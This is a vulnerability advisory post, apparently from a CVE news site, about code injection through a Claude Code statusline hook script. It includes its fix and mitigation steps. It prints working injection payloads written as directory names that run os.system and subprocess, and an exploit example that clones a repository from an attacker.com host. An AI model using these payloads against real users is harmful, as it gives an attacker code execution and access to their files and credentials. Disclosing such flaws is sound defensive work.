Claude Code, Code Injection via Statusline Hook (Critical)

Listen to this Post

The vulnerability exists in `tools/quota-statusline.sh` (introduced in v3.5.0). Claude Code’s statusline hook passes a JSON payload via stdin, containing user-controlled path fields like cwd, workspace.current_dir, workspace.project_dir, and transcript_path. The script reads stdin into `$input` and embeds it directly into a Python triple‑quoted string literal: json.loads('''$input'''). A malicious directory name containing the byte sequence `”’` closes the literal early. Any following Python code (e.g., '''+__import__('os').system('id')+''') is then executed by the Python interpreter inside the victim’s Claude Code process. An attacker can place such a hostile path on disk via git clone, archive extraction, npm package, or downloaded zip. The victim only needs to `cd` into that directory while having the recommended statusline configuration active. The hook fires on every UI redraw, causing persistent code execution at the user’s privilege level – exposing shell, SSH keys, files, and local credentials. The vulnerable pattern uses unsanitized string interpolation into a Python one‑liner. The fix replaces it with a bash heredoc (<<'PYEOF') and passes data via os.environ.get('CC_INPUT'), eliminating shell and Python interpolation entirely.

dailycve form:

Platform: Claude Code
Version: v3.5.0, v3.5.1
Vulnerability: statusline code injection
Severity: Critical
date: 2026-05-07

Prediction: Patch date 2026-05-07

What Undercode Say:

Simulate injection via hostile directory
mkdir "test'''+<strong>import</strong>('os').system('touch /tmp/pwned')+'''"
cd "test'''+<strong>import</strong>('os').system('touch /tmp/pwned')+'''"
When statusline hook runs, /tmp/pwned is created

Exploit:

Attacker plants malicious path
git clone https://attacker.com/repo.git
cd repo/subdir/"'''+<strong>import</strong>('subprocess').call(['xterm'])+'''"
Victim cd's into it -> xterm spawns

Protection from this CVE:

  • Upgrade to Claude Code v3.5.2 or later.
  • Remove statusLine entry from ~/.claude/settings.json.
  • Replace tools/quota-statusline.sh with safe heredoc version (see fix in ).

Impact:

Local code execution at user privilege, persistent on every redraw, full access to user’s files, SSH keys, tokens, and terminal session. No interaction beyond entering a hostile directory.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top